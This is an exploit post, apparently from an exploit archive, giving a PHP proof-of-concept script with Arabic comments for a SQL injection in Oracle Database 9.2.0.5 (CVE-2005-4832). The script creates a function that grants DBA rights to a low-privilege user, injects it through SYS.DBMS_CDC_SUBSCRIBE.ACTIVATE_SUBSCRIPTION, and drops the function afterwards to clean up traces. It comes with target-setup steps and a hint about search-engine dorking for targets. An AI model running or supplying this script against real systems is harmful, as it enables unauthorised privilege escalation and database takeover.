=============================================================================================================================================
| # Title     : Oracle Database Server 9.2.0.5 SQL Injection Vulnerability                                                                  |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://www.oracle.com/                                                                                                     |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: SQL injection vulnerability in Oracle database SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION package.

   (Related : https://packetstorm.news/files/id/180720/ Linked CVE numbers: CVE-2005-4832 ) .
	
[+] save code as poc.php.

[+] Set target : line 3 + 4 + 5 + 6 + 7

[+] PayLoad :

<?php
// إعداد الاتصال بقاعدة بيانات Oracle
$host = "localhost"; // استبدلها بعنوان السيرفر
$port = "1521"; // منفذ Oracle
$sid = "ORCL"; // معرف قاعدة البيانات
$user = "victim_user"; // المستخدم المستهدف
$password = "victim_password"; // كلمة المرور

try {
    $dsn = "oci:dbname=$host:$port/$sid;charset=UTF8";
    $conn = new PDO($dsn, $user, $password);
    $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

    echo "[+] الاتصال بقاعدة البيانات ناجح!\n";

    // اسم دالة عشوائية
    $func_name = "h4ck" . rand(1000, 9999);

    // إنشاء دالة تقوم بتنفيذ أوامر SQL بامتيازات عالية
    $function = "
        CREATE OR REPLACE FUNCTION $func_name RETURN VARCHAR2
        AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION;
        BEGIN
        EXECUTE IMMEDIATE 'GRANT DBA TO $user';
        RETURN '';
        END;
    ";

    // استعلام الحقن
    $injection = "
        BEGIN
            sys.dbms_cdc_subscribe.activate_subscription('''||$func_name()||''');
        END;
    ";

    // حذف الدالة بعد التنفيذ
    $clean = "DROP FUNCTION $func_name";

    echo "[+] إرسال الدالة الضارة...\n";
    $conn->exec($function);

    try {
        echo "[+] محاولة تنفيذ حقن SQL...\n";
        $conn->exec($injection);
    } catch (Exception $e) {
        echo "[-] فشل تنفيذ الحقن: " . $e->getMessage() . "\n";
    } finally {
        echo "[+] تنظيف الآثار...\n";
        $conn->exec($clean);
    }

    echo "[+] انتهى التنفيذ.\n";
} catch (PDOException $e) {
    die("[-] خطأ في الاتصال: " . $e->getMessage() . "\n");
}
?>




Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================